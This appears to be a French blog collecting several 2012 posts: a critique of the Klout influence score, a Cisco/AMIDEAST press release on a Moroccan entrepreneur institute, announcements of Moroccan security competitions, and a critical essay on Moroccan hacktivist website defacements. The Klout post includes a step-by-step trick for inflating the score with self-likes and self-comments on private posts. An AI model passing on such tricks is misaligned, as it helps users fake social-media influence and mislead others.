Sans oublier les non-utilisateurs de Klout qui sont comptés plusieurs fois, 1fois pour chaque réseau tant qu’ils n’ont pas relié leurs comptes sur ce dernier..

Klout est assez limité dans le temps

Klout s’inscrit en temps réel sur une courte durée et non sur l’activité complète de l’individu connecté sur une période donnée. L’influence n’a jamais été relative à notre capacité à rester en alerte de manière constante.

Du coup, si vous partez en vacance et que vous décidez de faire une petite pause, votre Score Klout va considérablement chuter. Oubliez donc les vacances, les pauses et ne tombez pas malades! compris? :p

Des problèmes de sémantique

Échanger avec certaines personnes n’est pas un signe d’influence. cependant, Klout prend en considération toute mention ou réponse à un Tweet sans en saisir le sens que ce soit négatif ou positif! un tweet du genre: « Si vous aussi vous êtes réveillés RT » n’engage en aucun cas une interaction, pourtant ce tweet peut faire objet d’une centaine de RT, est ce que cela signifie que la personne l’ayant tweeté est influente? absolument pas!

En quelques mots: Que l’échange avec les individus soit cordial ou pas, Klout ne fait que prendre en considération toute forme de réponse.

« Klout score » est facilement contournable:

Le Klout score est composé de trois parties:

• Le True Teach: l’audience réelle (Followers, Amis..) note de 1 a 100
• l’Amplification: L’écho numérique (Total des RT, nombre de @, total des “J’aime”, total des commentaires) note de 1 a 100
• Network: l’autorité de ton audience

Intéressons-nous au deuxième point: L’amplification et plus précisément le « Total des j’aime » et « total des commentaires ».

Avec Facebook, l’utilisateur peut contrôler la visibilité de ses publications. Étant donné que Klout possède l’accès à toutes vos publications il ne dépend pas de ces paramètres. Voici donc un scénario qui a un impact considérable sur l’Amplification et qui permet avoir un Klout Score > 50 facilement.

• Publier un statut sur son mur
• Changer les paramètres de confidentialité à « Moi seulement »
• Aimer la publication
• Commenter n fois sa publication
• Aimer chacun de ses commentaires

Pour Klout ça fait n « J’aime reçu » et n « Commentaire » et au bout d’une cinquantaine de commentaires vous verrez votre score exploser..

Conclusion

Klout est une belle initiative qui vise à standariser le concept de l’e-influence, il permet de vous donner des indicateurs par rapport à votre activité sur les réseaux sociaux. La manière dont il calcule l’influence est très flou et a besoin d’améliorations surtout au niveau de la sémantique.

Si vous vous basez sur votre Klout Score pour dire que vous êtes influent, alors vous êtes foireux aussi, Le concept de l’influence va plus loin qu’un RT ou partage sur Facebook :)

Tweet

AMIDEAST s’allie à Cisco dans le but de délivrer de nouveaux outils technologiques et de formation afin de créer de nouvelles opportunités de revenus et de nouveaux clients pour les entreprises à travers l’Afrique du Nord et le Moyen-Orient.
SKHIRAT, Maroc, le 27 mars 2012: Cisco a annoncé aujourd’hui l’inauguration d’un centre de formation Cisco® Entrepreneur Institute au Maroc en collaboration avec America-Mideast Education and Training Services, Inc. (AMIDEAST). L’Entrepreneur Institute fournira des séances de formation accélérée grâce à l’utilisation de la technologie.

AMIDEAST – une organisation privée à but non-lucratif dont la mission est de renforcer l’entente mutuelle et la coopération entre les américains et les peuples du Moyen-Orient et de l’Afrique du Nord – offrira des sessions d’apprentissage individuelles en personne ainsi que des séances à distance afin d’aider les entrepreneurs à travers la région à améliorer leurs compétences et à optimiser les opportunités de développement des affaires. Cela servira également de forum aux propriétaires de petites et moyennes entreprises (PME), leur permettant ainsi de collaborer et d’échanger leurs expertises en affaires.

Les petites et moyennes entreprises représentent une part importante de l’économie aussi bien Nord-Africaine que Moyen-Orientale, ainsi, soutenir leur développement et piloter leurs performances pourra au final les aider à accélérer leur croissance économique et accroître le niveau de vie. Les cours de l’Entrepreneur Institute de Cisco sont conçus pour accélérer le business via une utilisation efficace de la technologie tout en encourageant les solutions innovantes via le partage des meilleures pratiques, qui à leur tour permettront non seulement une croissance continue mais aussi la création d’emplois.

Points culminants / Faits essentiels:

• En vertu de l’accord avec le Cisco Entrepreneur Institute, AMIDEAST a maintenant mis en place des centres de formation Cisco Entrepreneur Institute au sein de leurs bureaux marocains, ainsi qu’au Liban, à Oman, en Tunisie et en Cisjordanie / Gaza.
• Des entrepreneurs jeunes seront recrutés afin de participer aux cours de base de l’Institut, à savoir « Démarrage d’une entreprise », « Développement d’une entreprise » ainsi que « Les Essentiels d’une Entreprise iExec », de même que plusieurs cours individualisés dont « L’Etat d’esprit entrepreneurial » et « Web 2.0 ». « Démarrage d’une entreprise » et « Les Essentiels d’une Entreprise iExec » sont disponibles en français et en anglais.

Le Cisco Entrepreneur Institute offre quatre cursus de base, avec pour cible aussi bien les micro-entreprises que les entreprises de plus grand calibre. L’Institut a pour mission d’accélérer le business via une utilisation efficace des solutions technologiques, accroître l’emploi et assister au développement et au maintien de la croissance économique à travers le monde.

Cela favorise l’innovation, la croissance et la prospérité tout en aidant à transformer les économies et le paysage social mondial en montrant la valeur que peut apporter la technologie aux affaires et en apportant un centre de ressources pour entreprises offrant conseils, mentorat, des solutions Internet pour entreprises et une technologie de réseau humaine.

• Le Cisco Entrepreneur Institute soutien des entreprises à travers le monde en travaillant avec les gouvernement locaux et des organisations professionnelles dans le but de favoriser la création et le succès des petites et moyennes entreprises. Ils fournissent un aperçu pratique des affaires, des outils et des technologies afin de mieux poser les bases du succès. Cette approche qui favorise les résultats crée une prospérité aussi bien économique que sociale sur le long-terme pour les entreprises, les communautés et les nations. En même temps, les Cisco Entr

epreneurs Institutes aident à mieux étendre le business de Cisco ainsi que son impact social à travers le monde.

• Les Cisco Entrepreneur Institutes sont déjà présents en Arabie Saoudite, en Egypte, au Liban, au Maroc, à Oman, en Tunisie, aux Emirats Arabes Unis et en Cisjordanie / Gaza. Dans la région Moyen-Orient Afrique du Nord Levant (MENAL), des Instituts sont présents dans huit pays avec un total de quinze Cisco Entrepreneur Institutes. Créé en 2007, le Cisco Entrepreneur Institute est aujourd’hui présent dans 35 pays avec 132 instituts et formé plus de 170 000 entrepreneurs.

Citations:

Joe Phillips Country Director, AMIDEAST

AMIDEAST est fière de poursuivre son partenariat avec Cisco en soutenant l’expansion de l’employabilité au Moyen-Orient et en Afrique du Nord. Le Cisco Entrepreneur Institute s’inscrit en étroite collaboration avec l’engagement d’AMIDEAST à fournir des opportunités de formatives et éducatives pour jeunes hommes et jeunes femmes cherchant à acquérir des compétences et des connaissances qui leur permettront de réussir dans un marché de plus en plus global tout en atteignant es objectifs personnels de plus en plus ambitieux. Nous avons hâte de rendre ces ressources disponibles afin de mieux soutenir la promotion individuelle et professionnelle ainsi que le développement d’idées nouvelles dans les sphères aussi bien privées que publiques.

Hassan Bahej, Directeur Général, Cisco Maroc

Cisco a utilisé la technologie tout au long de ses 25 ans d’existence afin de devenir l’une des plus importantes entreprises au monde. Son réseau toujours croissant de centres de formation et d’instituts locaux avaient été développés dans le but de partager son savoir-faire avec les hommes et femmes d’affaires et les entrepreneurs. Avec le lancement de notre Entrepreneur Institute au Maroc, Cisco réalise son objectif de collaborer avec des organisations communautaires et des bureaux locaux de gouvernement en Afrique du Nord afin de créer une communauté de soutien qui facilitera la réussite entrepreneuriale dans la région grâce à la collaboration.

Pour plus d’informations, renseignez-vous sur le Cisco Entrepreneur Institute sur le site officiel

Tweet

Si vous êtes un passionné de la sécurité informatique et de l’Ethical Hacking, voici 3 événements à ne pas rater! une opportunité pour rencontrer d’autres fou-furieux de la sécurité ainsi que des professionnels du métier.
Deux compétitions pour mesurer vos talents et vos compétences et gagner des prix, et aussi une conférence autour de « la cybercriminalité et la confiance numérique au maroc »

Rabat : MCSC – Moroccan Cyber Security Challange

La deuxième édition des Moroccan Cyber Security Challenge est prévue pour le 11 et 12 mai 2012 à l’ENSIAS de Rabat, l’événement s’étalera sur 2 jours, le premier pour les conférences et accueil des participant, et le deuxième pour les challenges et remise des prix, après le succès de la première édition, le club organisateur (INSECLUB) vous réserve plusieurs surprises, des conférenciers à l’échelle international issus des acteurs majeurs dans le domaine de la sécurité et du web tel-que OWASP, Google et Facebook seront présents pour parler autour de la sécurité des systèmes d’information!

Plus d’info sur la page facebook de MCSC : Moroccan Cyber Security Challange

Marrakech: Ethical Security Challenge (JNS ESC)

Dans le même esprit des MCSC (JNS ESC) « Ethical Security Challenge », a pour premier but de tester les connaissances en matières d’Ethical Hacking des équipes venues de tout le Maroc, mais aussi et surtout de s’affronter dans une ambiance amicale.
Huit heures d’épreuves pendant lesquelles des casse-têtes de sécurité informatique sont mis en place que ce soit en réseau domestiques, en web, en applicatif, en failles physiques ou encore reverse engineering…
Les épreuves seront pour chaque catégorie du niveau basique jusqu’à haut niveau de technicité.
Ethical Security Challenge se déroulera entre le 20 et 21 avril 2012 à l’ENSA de Marrakech

Plus d’infos sur La page facebook de l’événement: JNS.ESC

Tanger: La troisième édition de la journée de sécurité informatique

Suite à la réussite des deux premières éditions de la journée, le club INFOSoft font suivre la manifestation par une troisième édition pour cette année « SPECIAL SECURITY EVENT », l’événement aura lieu le 21 Avril à l’FST de Tanger

Cette journée aura comme thème « la cybercriminalité et la confiance numérique au maroc » et sera marqué par la présence de professionnels dans le domaine de sécurité informatique tel-que Ali El Azzouzi, Directeur général de DataProtect et auteur du livre « cybercriminalité au Maroc ».

Page officiel de l’événement: Special Security Event (évènement de sécurité informatique) 2012

De mon coté, je suis très content de voir des événements autour de la sécurité informatique fleurir au Maroc, et je serai sans doute présent aux challenges MCSC pour vous faire un livetweet (suivez le hashtag #mcsc), je participerai également aux challenges à l’ENSA de Marrakech avec une équipe de fous-furieux de sécurité, j’espère que j’aurai suffisamment le temps pour vous faire un compte rendu des journées!

A très bientôt

Tweet

« Un arrière plan noir, le drapeau marocain et la musique du hymne national jouée en arrière plan », c’est à ça que ressemble les pages d’accueil de plusieurs sites piratés par des pirates marocains, les motivations des attaquants diffèrent et sont souvent accompagnées de revendications ou protestations contre un fait, les acteurs du déface sont parfois des particuliers qui défendent une cause, des rassemblements ou mouvements qui prétendent « défendre les intérêts suprêmes du Royaume », parfois juste des malins qui aiment se démarquer faire parler d’eux.

Les hacktivistes marocains, leur réputation les précéde

Depuis 2006 les hacktivistes marocains en su faire parler d’eux et ont gagné de la notoriété en matière de cyber-activisme, selon Jeffrey Carr dans son livre Inside Cyber Warefare: Entre juin et nouvembre 2006 un groupe marocain intitulé « Team-evil » ont piraté plus de 8000 sites israéliens dont 171 sites gouvernementales et de grandes marques. Les pirates israéliens ont répondu à leur manière, le groupe « TEAM Good » ont piraté OMIHOST l’un des plus grands hébergeurs marocains à l’époque en défigurant les pages d’accueil de 250 sites internet marocains.

La même année a connu une vague de cyber-attaques contre le web danois, plus de 1000 sites danois ont été piraté pour protester contre la publication de caricatures offensives du prophète Mohammed selon zone-h.

En Mai 2009, des hacktivistes marocains, attaquent une 50ène de sites algériens ainsi que plusieurs sites du Polisario dont polisario-confidential.org et le site officiel de Tindouf (tindouf.org).

And suddenly Bouzebbal appears

L’année 2011 a été marquée par l’apparition d’ un collectif de hackers marocains qui se auto-proclament « défenseurs des intérêts suprêmes du Royaume », il s’agit d’une bande d’idiots qui s’intitulent « MoroccanKingdom » ou encore « قوات الرضع », euh non je voulais dire « قوات الردع المغربية « , qui défacent à tout va des sites internet de QATAR ainsi que des sites algériens en mettant parfois des messages haineux, les membres de ces groupes prétendent être des nationalistes marocains défendant la souveraineté du Maroc sur le Sahara..

Une véritable comédie qui manque d’éthique et qui a malheureusement su faire parler d’elle, les conséquences sont pourtant pesantes, et ceci rend les dimensions politiques, suite à ces incidents, plus compliquées. pirater un site Qatarien qui n’a rien à voir avec l’émission qui a été diffusée n’est pas une bonne forme de militantisme, c’est aux Media marocains d’être à la hauteur et défendre les valeurs de la société marocaine à l’échelle international.

Un terrain agréable et très amusant

La cyber-guère proclamée par les médias entre les hacktivistes marocains et ceux des autres pays arabes et nos confrères algériens n’est pas sensée, il faut plutôt dire que les adversaires ont trouvé un terrain agréable et bourrés de failles pour s’éclater, à ce jour le web marocain n’est pas à l’abri et a encore du chemin devant lui pour renforcer sa sécurité ,qui ne figure pas malheureusement parmi les priorités. Aujourd’hui avec les outils comme la distribution Linux BackTrack, trouver des sites vulnérables et défigurer leur page d’accueil ne demande pas des connaissances techniques assez poussées.

Je n’encourage pas le hacktivisme, mais j’ai toujours été fasciné par les actions qui défendent des causes ayant un impact global et qui laisse réfléchir (Anonymous par exemple), ce que font la majorité des pirates marocains fait partie du Random-Hacking et n’est en aucun cas du hacktivisme instructif, c’est des crimes qui font que des DSI risquent leurs job, des conneries qui mettent hors services des sites innocents et qui parfois nourrissent des familles, n’en soyons pas trop fiers :)

Bref, je serai curieux de savoir ce que vous pensez du Hacktivisme au Maroc

A très bientôt